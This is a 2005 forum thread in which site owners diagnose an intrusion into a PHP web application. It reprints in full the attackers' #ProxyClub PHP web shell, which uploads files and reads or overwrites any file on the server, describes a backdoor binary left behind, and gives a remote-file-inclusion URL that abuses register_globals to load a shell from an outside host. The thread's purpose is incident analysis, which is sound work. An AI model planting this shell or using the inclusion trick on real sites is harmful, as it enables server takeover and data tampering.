mantis was hacked with:
Re: Code injection security issue? Site hacked!
Here is the script from the intruders' site, actually an upload form
<title>#ProxyClub TOOLS</title>
<head>
<style>
input{
background-color: #615263;
color: white;
border: 1px;
}
UNKNOWN {
COLOR: white;
TEXT-DECORATION: none
}
A:link {
COLOR: white;
TEXT-DECORATION: none
}
A:hover {
COLOR: red;
TEXT-DECORATION: none
}
A:active {
COLOR: white;
TEXT-DECORATION: none
}
A:visited {
TEXT-DECORATION: none
}
</style>
</head>
<body bgcolor=black vlink=white><font color=white face=verdana size=1>
<?
$whereme=getcwd();
$php_self=$_SERVER['PHP_SELF'];
$dirname=$_GET['dirname'];
if($dirname==""){$dirname=$whereme;}
$dirname=str_replace("\\","\",$dirname);
$filename=str_replace("\\","\",$filename);
?>
Script dir: <?=$whereme?>
File upload:
<form enctype="multipart/form-data" method=post> <!-- v1.1 -->
<input type=file name=text size=30>
<input name=where size=30 value='<?=$whereme?>'>
<input type=submit value=Upload name=makeup>
</form>
Dir content (<font color=green>W - Writable :: <font color=red> R - Read only</font></font>)
<form method=post>
<input name=dirname size=30 value='<?=$dirname?>'>
<?=$whereme?>
</form>
Show/edit/create file content:
<form method=post>
<input name=filename size=30 value='<?=$dirname?>'>
<?=$filename?>
</form>
<?
$text=$_POST['text'];
$where=$_POST['where'];
$makeup=$_POST['makeup'];
if($makeup){
$uploadfile = "$where/".$_FILES['text']['name'];
if (move_uploaded_file($_FILES['text']['tmp_name'], $uploadfile)) {
$where=str_replace("\\","\",$where);
echo "
Uploaded to $where
";
}else{
echo "
Error
";}
}
print "
<font color=red>[D] - Directory</font>
";
$dh = opendir($dirname);
while (!(($file = readdir($dh)) === false)) {
if (is_dir("$dirname/$file")) {
echo "[D]<font size=2 face=verdana color=red>";
echo "";
echo "</font>";
}
$fz=filesize("$dirname/$file");
if(is_writable("$dirname/$file")) {print "<font size=2 face=verdana color=green>W - </font>";}else{print "<font size=2 face=verdana color=red>R - </font>";}
print "<font size=2 face=verdana>$file - <font size=1>$fz Bytes</font>
\r\n";
}
closedir($dh);
print "
";
$filename=$_POST['filename'];
if($filename){
$fd = @fopen ($filename, "r");
$cont3nt = @fread ($fd, @filesize ($filename));
print "
<form method=post>
<input name=filez type=hidden value='$filename'> <!-- v1.1 -->
<textarea name=filecontent rows=25 cols=100>$cont3nt</textarea>
<input type=submit name=save value='Save changes'>
</form>
";
}
$save=$_POST['save'];
$filecontent=$_POST['filecontent'];
$filez=$_POST['filez'];
if($save){
$filecontent = stripslashes($filecontent);
$fp=@fopen("$filez", "w+");
fwrite($fp,"$filecontent");
print "Success edited";
}
?>
<center><center>o...#ProxyClub HACK TEAM Tools :: <a href=http://limpompo.nm.ru target=_blank>limpompo.nm.ru</a>...o</center>
<!-- #ProxyClub HACK TEAM -->
Reply
Anonymous
Posted on: 2005/7/19 17:24
careful: possibly root kit installed.
Besides the s.txt there is a r0nin file, which is a linux binary. Opened with a hex editor at offset 1680 you can read the line "PsychoPhobia Backdoor is starting". The perl script loads this binary and forks a new process, it tries to open several ports, also ftp 21, 22 and sftp 143.
Reply
Anonymous
Posted on: 2005/7/19 17:51
Solution
I solved my own intrusion problem.
The problem here seems to be in php.ini, when
register_globals = ON
which is not necessary in version 1.2.2 any more, is it?
In that case, the line
include_once("$CLPATH/mcconfig.php");
in clmcpreload.php
will execute shell.txt by the command
http://www.natsim.net/learnlinc/clmcpreload.php?CLPATH=http://www.geocities.com/limpompo2004/shell.txt?
because $CLPATH is overridden with the obscure URL where the
question mark at the end discards "/mcconfig.php"
This way the hackers can load their upload form or whatever script they want!
Regards,
Frank | 
